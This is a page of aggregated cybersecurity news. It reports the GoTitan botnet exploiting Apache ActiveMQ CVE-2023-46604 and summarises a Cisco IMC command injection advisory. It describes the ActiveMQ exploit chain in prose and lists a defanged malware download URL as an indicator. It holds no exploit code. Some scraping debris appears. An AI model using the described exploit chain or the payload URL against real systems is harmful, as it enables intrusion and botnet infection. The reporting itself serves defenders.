The all in one place for non-profit security aid.
Instagram’s Threads reaches over 100 million users in five days. Mergers and acquisitions. Investments and exits. Executive moves. Company news. Labor markets. Read More
The CyberWire
GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability
Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ to disseminate the Golang-based botnet GoTitan and the.NET application “PrCtrl Rat,” which has the ability to be remotely controlled.
Any Operating System using Apache Active MQ versions earlier than 5.15.16, 5.16.7, 5.17.6, and 5.18.3 was susceptible to this critical vulnerability.
An advisory was released by Apache in October addressing this vulnerability (CVE-2023-46604) that pertains to the deserialization of untrusted data in Apache.
Due to the high risk and potential consequences of this vulnerability, CISA added CVE-2023-46604 to its list of known exploits, or KEV Catalog, on November 2.
Document
Protect Your Storage With SafeGuard
StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.
Generally, in this case, the attacker causes the system to unmarshal a class under their control by sending a crafted packet.
It is then necessary for a predefined XML file to be hosted externally for the susceptible server to be prompted to retrieve and load a class configuration XML file from the given remote URL.
The arbitrary code meant to run on the infected system is defined in the malicious XML file. Attackers can execute code on the remote, susceptible server by setting parameters like “cmd” or “bash.”
According to Fortinet researchers, this month, GoTitan, a new botnet, was identified, which may be obtained from the malicious URL “hxxp://91.92.242.14/main-linux-amd64s” and is written in the Go programming language. The malware runs certain checks prior to execution, and the attacker only offers binaries for x64 architectures.
Additionally, a file called “c.log” is created, containing the program status and execution time. It appears that this file is a developer’s debug log, indicating that GoTitan is still in its early stages of development.
Subsequently, it obtains the C2 IP address and crucial facts about the exploited endpoint, such as CPU details, memory, and architecture.
“GoTitan communicates with its C2 server by sending “xFExFE” as a heartbeat signal and waiting for further instructions. When it receives a command, it passes it to a function named “handle_socket_func2” that determines an attack method,” researchers explain.
Distributed denial-of-service (DDoS) attacks can be launched using 10 distinct methods by GoTitan: TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.
Researchers also found more well-known malware and tools in use, like Sliver, Kinsing, and Ddostf.
System updates, patching, and continuous monitoring of security advisories are essential to reduce the danger of exploitation.
Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.
The post GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability appeared first on Cyber Security News.
Cyber Security News
StripedFly reclassified from petty larceny to APT.
Not all unwanted programs are what they appear to be. (You knew that, but in this case a major threat poses as a minor nuisance.) Read More
The CyberWire
Cisco IMC Command Injection Vulnerability Under Active Attack
[[{“value”:”
An attacker with read-only or higher privileges on a Cisco Integrated Management Controller (IMC) can exploit a command injection vulnerability (CVE-2024-20295) to gain full control (root access) of the underlying operating system.
The vulnerability exists due to insufficient validation of user-supplied input on the IMC CLI and there are no workarounds available, but software updates to address this critical issue have been released.
A Cisco Integrated Management Controller (IMC) vulnerability allows authenticated local attackers with read-only privileges or higher to escalate privileges to root, which include applications like wireless controllers, APIC servers, Business Edition appliances, Catalyst Center appliances, and more.
The vulnerabilities that affected Cisco products include 5000 Series ENCS, Catalyst 8300 Series Edge uCPE, UCS C-Series and E-Series Servers, and various Cisco appliances based on preconfigured UCS C-SeriesḤ̣Ḥ Servers.
UCS B-Series Blade Servers, UCS C-Series Rack Servers under Cisco UCS Manager management, UCS S-Series Storage Servers, and UCS X-Series Modular Systems do not support Cisco IMC, which reduces the potential attack surface on these platforms. Cisco has not identified any vulnerabilities in these products.
Free Live Webinarfor DIFR/SOC Teams: Securing the Top 3 SME Cyber Attack Vectors – Register Here.
Cisco has released software updates to fix a recently discovered vulnerability, which are available for free to customers with service contracts that include software updates.
Users should update their software as soon as possible if they have a Cisco product that is susceptible to this vulnerability and keep in mind that they can only install and expect support for software versions that they have a license for.
To upgrade Cisco software, users must have a valid license obtained directly from Cisco or a partner, as upgrades are typically maintenance updates to existing software and free security updates won’t grant new licenses or major upgrades.
Before upgrading, users should check Cisco Security Advisories for known issues and solutions and they should ensure their devices have enough memory and compatibility with the new software.
The advisory addresses a vulnerability in Cisco software and customers who are not covered by a Cisco service contract or are unable to obtain a fix through their vendor should contact Cisco TAC for a free upgrade.
It also includes a table that lists affected software versions and the corresponding fixed releases.
For Cisco 5000 Series ENCS and Catalyst 8300 Series Edge uCPE, upgrading Cisco IMC requires upgrading the Cisco NFVIS software first and the IMC will be upgraded automatically during the NFVIS firmware upgrade process.
Details about the Cisco IMC software vulnerability and its fixes for Cisco UCS C-Series and E-Series servers are categorized by M-Series versions (M4, M5, M6, M7) and E-Series versions (M2, M3, M6).
It is recommended that Cisco IMC be upgraded to specific fixed releases based on the server model, and there are exceptions where specific firmware update packages or hotfixes are required for certain Cisco appliances.
Looking to Safeguard Your Company from Advanced Cyber Threats? Deploy TrustNet to Your Radar ASAP.
The post Cisco IMC Command Injection Vulnerability Under Active Attack appeared first on Cyber Security News.
“}]] Read More
Cyber Security News